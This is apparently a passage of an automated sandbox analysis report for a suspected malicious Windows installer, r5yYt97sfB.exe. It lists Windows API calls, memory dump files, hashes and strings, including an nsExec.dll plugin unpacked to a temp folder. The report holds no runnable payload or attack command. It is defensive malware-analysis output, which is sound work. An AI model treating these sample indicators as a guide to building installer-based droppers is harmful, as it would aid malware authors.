                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                              • String ID: "C:\Users\user\Desktop\r5yYt97sfB.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                                                                                                              • API String ID: 589700163-252668668
                                                                                                                                              • Opcode ID: 3926a558a1d5fac86b1a7f5ee3cbb5d374d5244e5857cfc5627c81e884b8420d
                                                                                                                                              • Instruction ID: 97757fea8cfc4e5e160e398f5921a23c68bb92f937fa9eb531f0d47839a376ba
                                                                                                                                              • Opcode Fuzzy Hash: 3926a558a1d5fac86b1a7f5ee3cbb5d374d5244e5857cfc5627c81e884b8420d
                                                                                                                                              • Instruction Fuzzy Hash: AE11941580171299DB307B189C80AB762F8EF94760F56843FED8AB32C0E77D5C9286BD
                                                                                                                                              APIs
                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004042CB
                                                                                                                                              • GetSysColor.USER32(00000000), ref: 004042E7
                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 004042F3
                                                                                                                                              • SetBkMode.GDI32(?,?), ref: 004042FF
                                                                                                                                              • GetSysColor.USER32(?), ref: 00404312
                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 00404322
                                                                                                                                              • DeleteObject.GDI32(?), ref: 0040433C
                                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404346
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                              • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                                              • Instruction ID: c8c0c82dcd415c8ab494bd2ee85d05619b55063599498dccf98d91aa8dec70c5
                                                                                                                                              • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                                              • Instruction Fuzzy Hash: 9C2154B15007449BC7219F68DE08B5B7BF8AF81714F08892DFD95E26A0D734E948CB54
                                                                                                                                              APIs
                                                                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                                                                • Part of subcall function 00405E39: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E4F
                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                              • String ID: 9
                                                                                                                                              • API String ID: 163830602-2366072709
                                                                                                                                              • Opcode ID: 54eb05019f2e59d002bdcf8ef70b12416628f11d58b5efd06b79a11da1a785d5
                                                                                                                                              • Instruction ID: 367b42b1b2af5c2ac759aacef6cd20ad90251cc9961805460d5ea366d256a81f
                                                                                                                                              • Opcode Fuzzy Hash: 54eb05019f2e59d002bdcf8ef70b12416628f11d58b5efd06b79a11da1a785d5
                                                                                                                                              • Instruction Fuzzy Hash: 19510874D00219ABDF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99942DB69
                                                                                                                                              APIs
                                                                                                                                              • DestroyWindow.USER32(00000000,00000000), ref: 00402DBA
                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402DD8
                                                                                                                                              • wsprintfW.USER32 ref: 00402E06
                                                                                                                                                • Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
                                                                                                                                                • Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
                                                                                                                                                • Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
                                                                                                                                                • Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
                                                                                                                                                • Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
                                                                                                                                                • Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
                                                                                                                                                • Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D
                                                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402E2A
                                                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402E38
                                                                                                                                                • Part of subcall function 00402D83: MulDiv.KERNEL32(0049557D,00000064,004965C0), ref: 00402D98
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                              • String ID: ... %d%%
                                                                                                                                              • API String ID: 722711167-2449383134
                                                                                                                                              • Opcode ID: 76c6048a3b7cbdf23ef159d9fff81f0a9f13728c5e7eb0bec8d1179ea8a0becc
                                                                                                                                              • Instruction ID: 2b011a82625418f68b8499a5732cb5b9e1a166e3b6ac7890347db752d15f278b
                                                                                                                                              • Opcode Fuzzy Hash: 76c6048a3b7cbdf23ef159d9fff81f0a9f13728c5e7eb0bec8d1179ea8a0becc
                                                                                                                                              • Instruction Fuzzy Hash: D7015230541624E7C6216B60EE4DA9B7668AF00B05B24407BF845F11E1DAB85455CBEE
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BC7
                                                                                                                                              • GetMessagePos.USER32 ref: 00404BCF
                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404BE9
                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFB
                                                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C21
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                              • String ID: f
                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                              • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                              • Instruction ID: 2ee92d30c3d4f62541dcb72b74cb9552329c9a0a7836ec50a82d95606e957567
                                                                                                                                              • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                              • Instruction Fuzzy Hash: 33015E71900218BAEB10DBA4DD85FFEBBBCAF54711F10412BBA51B61D0D7B4AA058BA4
                                                                                                                                              APIs
                                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                                                              • wsprintfW.USER32 ref: 00402D56
                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402D66
                                                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D78
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                                                              • Opcode ID: 341d5f173f72d28821ee7b690774ab615ca69fb47453f4e2e3432960910f7c7f
                                                                                                                                              • Instruction ID: dce893d37650e0a5fad71f20df5db28da565fcefcb4dd95a10239a167aca93fc
                                                                                                                                              • Opcode Fuzzy Hash: 341d5f173f72d28821ee7b690774ab615ca69fb47453f4e2e3432960910f7c7f
                                                                                                                                              • Instruction Fuzzy Hash: 19F0367050020DABEF206F60DD49BEA3B69EF04309F00803AFA55B51D0DFBD59558F59
                                                                                                                                              APIs
                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2667972263-0
                                                                                                                                              • Opcode ID: c17071a172e6611300c6e5c6d8e6fb9818479fdaec624330b34eaa9cfd7f242d
                                                                                                                                              • Instruction ID: f14c02afffa7b7907a5fd564506058e77daa58a1031cefc6daed455ed9e34e83
                                                                                                                                              • Opcode Fuzzy Hash: c17071a172e6611300c6e5c6d8e6fb9818479fdaec624330b34eaa9cfd7f242d
                                                                                                                                              • Instruction Fuzzy Hash: FC216F72800118BBCF216FA5CE49D9E7E79EF09324F24423AF550762E0CB795E41DB98
                                                                                                                                              APIs
                                                                                                                                              • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3F
                                                                                                                                              • wsprintfW.USER32 ref: 00404B48
                                                                                                                                              • SetDlgItemTextW.USER32(?,00423748), ref: 00404B5B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                              • String ID: %u.%u%s%s$H7B
                                                                                                                                              • API String ID: 3540041739-107966168
                                                                                                                                              • Opcode ID: 2c37dc16e7f305192eed0ac62bbfad02487635509ea4f811ded0739848cee536
                                                                                                                                              • Instruction ID: bb4960df2745a4ac69d0d477934f6cb15a160bb02a324f12832b476a5784c287
                                                                                                                                              • Opcode Fuzzy Hash: 2c37dc16e7f305192eed0ac62bbfad02487635509ea4f811ded0739848cee536
                                                                                                                                              • Instruction Fuzzy Hash: 3611D873A441283BEB10656D9C45F9E329CDB81334F254237FA26F61D1E979D82146EC
                                                                                                                                              APIs
                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,artikulationer\Udsorteringerne,000000FF,C:\Users\user~1\AppData\Local\Temp\nss7012.tmp\nsExec.dll,00000400,?,?,00000021), ref: 00402583
                                                                                                                                              • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nss7012.tmp\nsExec.dll,?,?,artikulationer\Udsorteringerne,000000FF,C:\Users\user~1\AppData\Local\Temp\nss7012.tmp\nsExec.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWidelstrlen
                                                                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\nss7012.tmp\nsExec.dll$artikulationer\Udsorteringerne
                                                                                                                                              • API String ID: 3109718747-1380557968
                                                                                                                                              • Opcode ID: 35ecabcbfaf6731e74d8ae70dbfedeb1cffa6cf56a096f4227e0e6c723131c42
                                                                                                                                              • Instruction ID: 3fd77634d05d68e607a2feda7018aaef600362da1068c31595f6dded202503df
                                                                                                                                              • Opcode Fuzzy Hash: 35ecabcbfaf6731e74d8ae70dbfedeb1cffa6cf56a096f4227e0e6c723131c42
                                                                                                                                              • Instruction Fuzzy Hash: 33112772A01204BBDB10AFB18F4AA9F32669F54344F20403BF402F61C1DAFC8E91566E
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
